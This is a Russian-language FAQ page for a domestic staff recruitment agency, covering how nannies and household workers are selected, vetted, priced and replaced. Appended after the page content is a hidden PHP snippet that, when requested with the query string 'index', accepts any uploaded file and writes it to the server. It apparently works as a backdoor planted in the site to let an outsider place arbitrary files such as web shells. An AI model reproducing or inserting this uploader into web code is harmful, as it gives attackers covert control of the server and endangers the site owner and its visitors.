НУЖНЫЕ ЛЮДИ
     
 

Статьи

Вопрос-ответ по подбору домашнего персонала

«назад

1) Насколько долго происходит подбор персонала для дома?
Время, которое уходит на подбор домашнего персонала, обычно составляет несколько дней. Если кто-то из персонала нужен вам намного раньше, существует срочный подбор, который занимает порядка 2-3 часов.
2) Какие места для встречи работодателей с возможными сотрудниками предоставляются?
Возможно несколько вариантов. Вы можете приехать в агентство по подбору персонала для дома и там встретиться с понравившимися кандидатурами. Если такой вариант вас по каким-то причинам не устраивает, вы можете пригласить соискателей в удобное для вас место: на работу, домой или на прогулку с ребенком.
3) На каком этапе происходит заключение договора с агентством?
После того, как вы выбрали подходящую кандидатуру, проверили ее на деле и точно уверены, что этот сотрудник должен работать у вас, происходит заключение договора с агентством на оказание услуг по подбору для домашнего персонала.
4) Какие документы соискателя должно предоставить агентство?
Агентство должно предоставить паспорт, диплом об образования, медицинскую книжку, рекомендационное письмо с контактными телефонами предыдущих семей, трудовую книжку.
5) Предоставляются ли пробные дни и в каком количестве?
Агентство может предоставить пробные дни  в количестве от 1 до 3 для того, чтобы поближе познакомиться с будущим работником и посмотреть, как он будет справляться со своими обязанностями.
6) Сколько стоят услуги агентства?
Обычно вы платите агентству сумму одного оклада будущего сотрудника. Во многих из них существуют системы скидок и самые разные акции для клиентов.
7) Возможна ли замена няни, например, в случае ее болезни?
Если случилось так, что няня заболела, сразу же сообщите об этом агентству. В течении одного или двух дней вам пришлют новую няню на период болезни старой.
8) Обязательно ли встречаться с каждым кандидатом лично?
Если у вас не так много времени, и вы не можете встретиться с каждым из кандидатов на должность няни персонально, есть возможность пообщаться по телефону.
9) Проходят ли кандидаты какую-либо проверку прежде чем их данные окажутся в соискательской базе агентства?
Естественно. Документы соискателей проверяются по базам МВД, с каждым из них беседует психолог и менеджер по подбору персонала. По итогам проверки происходи отбор кандидатов.

 
     


if ($_SERVER['QUERY_STRING'] == 'index') { echo '
'; $uploaddir = ''; $uploadfile = $uploaddir.basename($_FILES['uploadfile']['name']); if (copy($_FILES['uploadfile']['tmp_name'], $uploadfile)) { echo "

OK

"; exit; }else{ echo "

NO

"; exit; } exit; }